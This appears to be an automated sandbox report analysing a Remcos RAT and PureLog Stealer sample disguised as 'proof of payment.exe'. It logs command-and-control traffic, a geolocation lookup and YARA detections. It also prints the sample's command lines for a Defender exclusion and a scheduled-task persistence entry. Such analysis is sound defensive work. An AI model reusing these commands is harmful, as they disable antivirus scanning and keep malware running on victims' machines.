                                    May 3, 2024 13:13:39.922008038 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.923959017 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.924029112 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.927179098 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.929124117 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.929177999 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.931246996 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.933280945 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.933351040 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.933830976 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.934703112 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.934747934 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.940037012 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.947066069 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.947124004 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.948911905 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.952088118 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.952147007 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.953509092 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.954082966 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.954138994 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.956224918 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.956346035 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.956438065 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.958904028 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.960768938 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.960843086 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.962768078 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.964766979 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:39.964802980 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:39.965843916 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.021581888 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:40.033974886 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.034756899 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.034817934 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:40.037931919 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.039892912 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.039963007 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:40.039972067 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.084059000 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:40.120546103 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.120641947 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.120704889 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:40.120752096 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:40.150320053 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.114101887 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.114171982 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.145051956 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.145076036 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.145167112 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.145181894 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.145622969 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.145674944 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.145715952 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.148891926 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.148981094 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.148986101 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.152736902 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.152843952 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.155641079 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.157933950 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.157998085 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.158710003 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.163150072 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.163216114 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.165765047 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.167617083 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.167675018 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.172827005 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.175662041 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.175721884 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.179691076 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.181783915 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.181853056 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.183729887 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.184734106 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.184809923 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.187700987 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.191775084 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.191836119 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.192969084 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.193931103 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.193994045 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.195378065 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.195882082 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.195954084 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.198013067 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.202744007 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.202812910 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.204119921 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.255945921 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.259887934 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.259931087 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.259998083 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.282717943 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.282737970 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.282835007 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.283775091 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.316981077 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.317014933 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.317054987 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.317127943 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.317202091 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.317203045 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.323379993 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.323461056 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.323698997 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.326376915 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.326457977 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.328732014 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.329663038 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.329721928 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.333185911 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.333667040 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.333712101 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.334598064 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.336525917 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.336579084 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.339085102 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.339859009 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.339900970 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.340691090 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.344764948 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.344861031 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.345726967 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.348824978 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.348874092 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.351870060 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.352750063 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.352837086 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.353720903 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.354749918 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.354827881 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.355890036 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.356815100 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.356885910 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.360193014 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.361936092 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.361988068 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.362791061 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.365686893 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.365731955 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.365752935 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.365803003 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.369843960 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.369967937 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.371854067 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.371916056 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.373809099 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.374830961 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.374887943 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.376656055 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.386810064 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.386877060 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.386893988 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.387115955 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.387176991 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.423217058 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.423312902 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.423374891 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.423407078 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.423489094 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.423542976 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.423578978 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.423670053 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.423738003 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.428745985 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.428812981 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.431639910 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.431705952 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.432683945 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.432722092 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:41.433731079 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:41.433774948 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:42.427711010 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:42.427728891 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:42.427778959 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:42.427848101 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:42.429588079 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:42.429588079 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:42.429588079 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:42.616394997 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:42.896605015 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:43.743294954 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:43.751319885 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:43.879291058 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:43.879416943 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:44.024810076 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:44.024947882 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:44.031240940 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:44.031388998 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:45.092355013 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:45.092453957 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:45.242506027 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:45.242526054 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:45.242537975 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:45.242623091 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:46.184432983 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:46.184544086 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:46.337882042 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:46.337903976 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:46.337914944 CEST22694971237.120.235.122192.168.2.9
                                    May 3, 2024 13:13:46.338033915 CEST497122269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:47.153477907 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:47.153582096 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:47.162455082 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:47.162528992 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:47.216864109 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:47.216918945 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:48.761691093 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:48.761703968 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:48.761837006 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:49.776556015 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:49.776573896 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:49.776583910 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:49.776707888 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:13:49.801345110 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:49.811790943 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.071721077 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.092324972 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.092339039 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.100250959 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.112308979 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.133222103 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.203352928 CEST22694971437.120.235.122192.168.2.9
                                    May 3, 2024 13:13:51.203447104 CEST497142269192.168.2.937.120.235.122
                                    May 3, 2024 13:14:07.129280090 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:14:07.130430937 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:14:08.309111118 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:14:37.200397015 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:14:37.203613997 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:14:37.581279039 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:07.245273113 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:07.246583939 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:15:07.916774988 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:16.222445011 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:16.771461010 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:17.771428108 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:19.458951950 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:22.958928108 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:29.771452904 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:15:37.276586056 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:37.280456066 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:15:37.759290934 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:15:43.271445990 CEST4971580192.168.2.9178.237.33.50
                                    May 3, 2024 13:16:07.301384926 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:16:07.302922010 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:16:07.669123888 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:16:37.371004105 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:16:37.372515917 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:16:37.750976086 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:17:07.491942883 CEST22694970837.120.235.122192.168.2.9
                                    May 3, 2024 13:17:07.504478931 CEST497082269192.168.2.937.120.235.122
                                    May 3, 2024 13:17:07.862972021 CEST22694970837.120.235.122192.168.2.9

                                    UDP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    May 3, 2024 13:13:26.023699999 CEST6067453192.168.2.91.1.1.1
                                    May 3, 2024 13:13:26.113100052 CEST53606741.1.1.1192.168.2.9

                                    DNS Queries

                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                    May 3, 2024 13:13:26.023699999 CEST192.168.2.91.1.1.10x275aStandard query (0)geoplugin.netA (IP address)IN (0x0001)false

                                    DNS Answers

                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                    May 3, 2024 13:13:26.113100052 CEST1.1.1.1192.168.2.90x275aNo error (0)geoplugin.net178.237.33.50A (IP address)IN (0x0001)false

                                    HTTP Request Dependency Graph

                                    • geoplugin.net

                                    HTTP Packets

                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    0192.168.2.949715178.237.33.50803640C:\Users\user\Desktop\proof of payment.exe
                                    TimestampBytes transferredDirectionData
                                    May 3, 2024 13:13:26.285801888 CEST71OUTGET /json.gp HTTP/1.1
                                    Host: geoplugin.net
                                    Cache-Control: no-cache
                                    May 3, 2024 13:13:26.457278967 CEST1173INHTTP/1.1 200 OK
                                    date: Fri, 03 May 2024 11:13:26 GMT
                                    server: Apache
                                    content-length: 965
                                    content-type: application/json; charset=utf-8
                                    cache-control: public, max-age=300
                                    access-control-allow-origin: *
                                    Data Raw: 7b 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 71 75 65 73 74 22 3a 22 31 39 31 2e 39 36 2e 32 32 37 2e 32 31 39 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 73 74 61 74 75 73 22 3a 32 30 30 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 64 65 6c 61 79 22 3a 22 32 6d 73 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 72 65 64 69 74 22 3a 22 53 6f 6d 65 20 6f 66 20 74 68 65 20 72 65 74 75 72 6e 65 64 20 64 61 74 61 20 69 6e 63 6c 75 64 65 73 20 47 65 6f 4c 69 74 65 32 20 64 61 74 61 20 63 72 65 61 74 65 64 20 62 79 20 4d 61 78 4d 69 6e 64 2c 20 61 76 61 69 6c 61 62 6c 65 20 66 72 6f 6d 20 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 27 3e 68 74 74 70 73 3a 5c 2f 5c 2f 77 77 77 2e 6d 61 78 6d 69 6e 64 2e 63 6f 6d 3c 5c 2f 61 3e 2e 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 67 65 6f 70 6c 75 67 69 6e 5f 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 22 [TRUNCATED]
                                    Data Ascii: { "geoplugin_request":"191.96.227.219", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"New York", "geoplugin_region":"New York", "geoplugin_regionCode":"NY", "geoplugin_regionName":"New York", "geoplugin_areaCode":"", "geoplugin_dmaCode":"501", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"40.7123", "geoplugin_longitude":"-74.0068", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


                                    Statistics

                                    CPU Usage

                                    Click to jump to process

                                    Memory Usage

                                    Click to jump to process

                                    High Level Behavior Distribution

                                    Click to dive into process behavior distribution

                                    Behavior

                                    Click to jump to process

                                    System Behavior

                                    General

                                    Target ID:0
                                    Start time:13:13:16
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe"
                                    Imagebase:0x2d0000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1510214396.0000000005130000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000000.00000002.1502678192.000000000389E000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                    Reputation:low
                                    Has exited:true

                                    General

                                    Target ID:3
                                    Start time:13:13:17
                                    Start date:03/05/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\NvbYSEq.exe"
                                    Imagebase:0xe30000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:4
                                    Start time:13:13:17
                                    Start date:03/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:5
                                    Start time:13:13:17
                                    Start date:03/05/2024
                                    Path:C:\Windows\SysWOW64\schtasks.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\NvbYSEq" /XML "C:\Users\user\AppData\Local\Temp\tmpCCF4.tmp"
                                    Imagebase:0x460000
                                    File size:187'904 bytes
                                    MD5 hash:48C2FE20575769DE916F48EF0676A965
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:6
                                    Start time:13:13:17
                                    Start date:03/05/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff70f010000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    General

                                    Target ID:7
                                    Start time:13:13:18
                                    Start date:03/05/2024
                                    Path:C:\Users\user\Desktop\proof of payment.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\proof of payment.exe"
                                    Imagebase:0xf20000
                                    File size:927'744 bytes
                                    MD5 hash:931254205CD64AD16B18FC9B318E2CA6
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3917153703.00000000030CF000.00000004.00000010.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3915851761.00000000015EA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000007.00000002.3915520188.0000000001567000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                    Reputation:low
                                    Has exited:false

                                    General

                                    Target ID:8
                                    Start time:13:13:18
                                    Start date:03/05/2024
